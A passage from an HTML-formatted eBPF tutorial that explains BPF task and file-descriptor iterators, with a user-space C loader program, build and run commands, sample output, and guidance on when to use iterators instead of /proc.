&lt;p&gt;Once a task passes filtering, we extract its kernel stack trace using &lt;code&gt;bpf_get_task_stack()&lt;/code&gt;. This BPF helper captures up to 64 stack frames into our &lt;code&gt;entries&lt;/code&gt; array, returning the number of bytes written. We format the output using &lt;code&gt;BPF_SEQ_PRINTF()&lt;/code&gt; which writes to the kernel's seq_file infrastructure. The special &lt;code&gt;%pB&lt;/code&gt; format specifier symbolizes kernel addresses, turning raw pointers into human-readable function names like &lt;code&gt;schedule+0x42/0x100&lt;/code&gt;. This makes stack traces immediately useful for debugging.&lt;/p&gt;

&lt;p&gt;The file descriptor iterator demonstrates a different iterator type. &lt;code&gt;SEC("iter/task_file")&lt;/code&gt; tells the kernel to call this function for every open file descriptor across all tasks. The context provides &lt;code&gt;task&lt;/code&gt;, &lt;code&gt;file&lt;/code&gt; (the kernel's struct file pointer), and &lt;code&gt;fd&lt;/code&gt; (the numeric file descriptor). We apply the same task name filtering, then format output as a table. Using &lt;code&gt;ctx-&amp;gt;meta-&amp;gt;seq_num&lt;/code&gt; to detect the first output lets us print column headers exactly once.&lt;/p&gt;

&lt;p&gt;Notice how filtering happens before any expensive operations. We check the task name first, and only if it matches do we extract stack traces or format file information. This minimizes work in the kernel fast path - non-matching tasks are rejected with just a string comparison, no memory allocation, no formatting, no output.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete User-Space Program: task_stack.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Userspace program for task stack and file iterator */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"task_stack.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;libbpf_print_level&lt;/span&gt; &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;va_list&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;vfprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;run_iterator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_program&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;8192&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_iter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to attach %s iterator&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;iter_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_iter_create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_link__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iter_fd&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to create %s iterator: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_stack_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;show_files&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;libbpf_set_print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse arguments */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"--files"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;show_files&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open BPF application */&lt;/span&gt;
    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;task_stack_bpf__open&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Configure filter before loading */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;strncpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Filtering for tasks matching: %s&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Usage: %s [--files] [comm]&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  --files    Show open file descriptors instead of stacks&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  comm       Filter by process name&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Load BPF program */&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;task_stack_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to load BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;show_files&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"=== BPF Task File Descriptor Iterator ===&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;run_iterator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"task_file"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dump_task_file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"=== BPF Task Stack Iterator ===&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;run_iterator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"task"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dump_task_stack&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;task_stack_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program showcases how simple iterator usage is once you understand the pattern. The &lt;code&gt;run_iterator()&lt;/code&gt; function encapsulates the three-step iterator lifecycle. First, &lt;code&gt;bpf_program__attach_iter()&lt;/code&gt; attaches the BPF program to the iterator infrastructure, registering it to be called during iteration. Second, &lt;code&gt;bpf_iter_create()&lt;/code&gt; creates a file descriptor representing an iterator instance. Third, simple &lt;code&gt;read()&lt;/code&gt; calls consume the iterator output.&lt;/p&gt;

&lt;p&gt;Here's what makes this powerful: when you read from the iterator fd, the kernel transparently starts walking tasks or files. For each element, it calls your BPF program passing the element's context. Your BPF code filters and formats output to a seq_file buffer. The kernel accumulates this output and returns it through the read() call. From userspace's perspective, it's just reading a file - all the iteration, filtering, and formatting complexity is hidden in the kernel.&lt;/p&gt;

&lt;p&gt;The main function handles mode selection and configuration. We parse command-line arguments to determine whether to show stacks or files, and what process name to filter for. Critically, we set &lt;code&gt;skel-&amp;gt;bss-&amp;gt;target_comm&lt;/code&gt; before loading the BPF program. This writes the filter string into the BPF program's global data section, making it visible to kernel code when the program runs. This is how we pass configuration from userspace to kernel without complex communication channels.&lt;/p&gt;

&lt;p&gt;After loading, we select which iterator to run based on the &lt;code&gt;--files&lt;/code&gt; flag. Both iterators use the same filtering logic, but produce different output - one shows stack traces, the other shows file descriptors. The shared filtering code demonstrates how BPF programs can implement reusable logic across different iterator types.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the bpf_iters directory and build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_iters
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the BPF program with BTF support and generates a skeleton header containing the compiled bytecode embedded in C structures. This skeleton API makes BPF program loading trivial.&lt;/p&gt;

&lt;p&gt;Show kernel stack traces for all systemd processes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./task_stack systemd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Filtering for tasks matching: systemd

=== BPF Task Stack Iterator ===

=== Task: systemd (pid=1, tgid=1) ===
Stack depth: 6 frames
  [ 0] ep_poll+0x447/0x460
  [ 1] do_epoll_wait+0xc3/0xe0
  [ 2] __x64_sys_epoll_wait+0x6d/0x110
  [ 3] x64_sys_call+0x19b1/0x2310
  [ 4] do_syscall_64+0x7e/0x170
  [ 5] entry_SYSCALL_64_after_hwframe+0x76/0x7e

=== Summary: 1 task stacks shown ===
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Show open file descriptors for bash processes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./task_stack &lt;span class="nt"&gt;--files&lt;/span&gt; bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Filtering for tasks matching: bash

=== BPF Task File Descriptor Iterator ===

COMM                 TGID      PID     FD FILE_OPS
bash                12345    12345      0 0xffffffff81e3c6e0
bash                12345    12345      1 0xffffffff81e3c6e0
bash                12345    12345      2 0xffffffff81e3c6e0
bash                12345    12345    255 0xffffffff82145dc0

=== Summary: 4 file descriptors shown ===
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run without filtering to see all tasks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./task_stack
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This shows stacks for every task in the system. On a typical desktop, this might display hundreds of tasks. Notice how fast it runs compared to parsing &lt;code&gt;/proc/*/stack&lt;/code&gt; for all processes - the iterator is dramatically more efficient.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use BPF Iterators vs /proc
&lt;/h2&gt;

&lt;p&gt;Choose &lt;strong&gt;BPF iterators&lt;/strong&gt; when you need filtered kernel data without userspace processing overhead, custom output formats that don't match &lt;code&gt;/proc&lt;/code&gt; text, performance-critical monitoring that runs frequently, or integration with BPF-based observability infrastructure. Iterators excel when you're monitoring many entities but only care about a subset, or when you need to aggregate and transform data in the kernel.&lt;/p&gt;

&lt;p&gt;Choose &lt;strong&gt;/proc&lt;/strong&gt; when you need simple one-off queries, are debugging or prototyping where development speed matters more than runtime performance, want maximum portability across kernel versions (iterators require relatively recent kernels), or run in restricted environments where you can't load BPF programs.&lt;/p&gt;

&lt;p&gt;The fundamental trade-off is processing location. Iterators push filtering and formatting into the kernel for efficiency and flexibility, while &lt;code&gt;/proc&lt;/code&gt; keeps the kernel simple and does all processing in userspace. For production monitoring of complex systems, iterators usually win due to their performance benefits and programming flexibility.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary and Next Steps
&lt;/h2&gt;

&lt;p&gt;BPF iterators revolutionize how we export kernel data by enabling programmable, filtered iteration directly from BPF code. Instead of repeatedly reading and parsing &lt;code&gt;/proc&lt;/code&gt; files, you write a BPF program that iterates kernel structures in-kernel, applies filtering at the source, and formats output exactly as needed. This eliminates massive overhead from syscalls, mode transitions, and userspace parsing while providing complete flexibility in output format.&lt;/p&gt;

&lt;p&gt;Our dual-mode iterator demonstrates both task and file iteration, showing how one BPF program can export multiple views of kernel data with shared filtering logic. The kernel handles complex iteration mechanics while your BPF code focuses purely on filtering and formatting. Iterators integrate seamlessly with standard Unix tools through their file descriptor interface, making them composable building blocks for sophisticated monitoring pipelines.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;BPF Iterator Documentation:&lt;/strong&gt; &lt;a href="https://docs.kernel.org/bpf/bpf_iterators.html" rel="noopener noreferrer"&gt;https://docs.kernel.org/bpf/bpf_iterators.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Iterator Selftests:&lt;/strong&gt; Linux kernel tree &lt;code&gt;tools/testing/selftests/bpf/*iter*.c&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
